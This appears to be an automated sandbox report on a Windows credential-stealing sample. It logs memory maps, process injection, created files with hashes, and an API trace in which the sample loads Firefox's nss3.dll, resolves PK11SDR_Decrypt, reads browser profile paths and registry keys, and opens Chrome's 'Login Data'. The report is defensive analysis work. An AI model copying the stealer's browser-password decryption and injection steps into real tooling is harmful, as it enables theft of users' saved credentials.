| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76680000 | 0x767f4fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76ce0000 | 0x76d71fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76ed0000 | 0x76f2bfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76f30000 | 0x77019fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77020000 | 0x77055fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x771c0000 | 0x771cdfff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ec74000 | 0x7ec74000 | 0x7ec76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec77000 | 0x7ec77000 | 0x7ec79fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec7a000 | 0x7ec7a000 | 0x7ec7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec7d000 | 0x7ec7d000 | 0x7ec7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7ed7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7eda2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eda3000 | 0x7eda3000 | 0x7eda3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eda5000 | 0x7eda5000 | 0x7eda7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eda8000 | 0x7eda8000 | 0x7edaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edab000 | 0x7edab000 | 0x7edadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edae000 | 0x7edae000 | 0x7edaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x400000, size = 1024 |
|
1 | |
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x401000, size = 79872 |
|
1 | |
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x415000, size = 16896 |
|
1 | |
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x41a000, size = 512 |
|
1 | |
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x4a0000, size = 8192 |
|
1 | |
| Modify Memory | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | address = 0x7edae008, size = 4 |
|
1 | |
| Modify Control Flow | #1: c:\users\ciihmnxmn6ps\desktop\aqszpl.exe | 0xee8 | os_tid = 0xf2c, address = 0x779faef0 |
|
1 |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe | 34.35 KB |
MD5:
a412dedac6a1ff7ba06feb3b6725495e
SHA1: bcae71ba4068be87f9d5739afec8f7081d00a97e SHA256: b4853f76dfe066a5b2aeb3166bac4d6ff1548e9119205f65ac6cab6d165f9850 SSDeep: 768:a9ng5dqluvtOnVZPn/mW1GT3Qk1P7kGB:Kg5dvcTP/BGT3Q0P7k |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U |
|
|
| c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b | 0.05 KB |
MD5:
eca0470178275ac94e5de381969ed232
SHA1: d6de27e734eec57d1dda73489b4a6d6eecae3038 SHA256: 353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 SSDeep: 3:: |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb | 0.00 KB |
MD5:
aee1587391978acd0d0987dde93d05c6
SHA1: 418954d08d2fff0318c94e488c67a7de32f78b58 SHA256: f10b441a59ec65e42a7075ab6246a5ad8f06541c3e6eae64d4211151d9819dfe SSDeep: 3:O:O |
|
|
| c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b | 0.05 KB |
MD5:
0e74b2d60180ca3a437d55528e1845ff
SHA1: f002adc25ab2fc62b181790d0f5369045b4966e5 SHA256: 75183ca2bd0d0ee61fa5ac42333bb6235eefa8f5210a42fc758ea03223105cfe SSDeep: 3:/l4lQgdocl:exdocl |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b | 0.05 KB |
MD5:
eca0470178275ac94e5de381969ed232
SHA1: d6de27e734eec57d1dda73489b4a6d6eecae3038 SHA256: 353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 SSDeep: 3:: |
|
|
Threads
Thread 0xf2c
1501
277
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76ce0000 |
|
1 | |
| Module | Load | module_name = ws2_32.dll, base_address = 0x76ed0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x76f30000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 52 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
6 | |
| Mutex | Create | mutex_name = 66BF479BAEF25E987DDFD92A |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main, value_name = Install Directory |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
2 | |
| Environment | Set Environment String | name = PATH, value = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x73580000 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7360ee9a |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7360f125 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73632f61 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x736329d3 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x7361bb28 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x7362ef47 |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x7361bc2d |
|
1 | |
| Module | Get Address | module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = SECITEM_FreeItem, address_out = 0x736100e2 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/8i341t8m.default |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path |
|
1 | |
| Environment | Set Environment String | name = PATH, value = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup, value_name = SetupPath |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari, value_name = InstallDir |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock, value_name = CurrentVersion |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| File | Create | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 18432, size_out = 18432 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
13 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
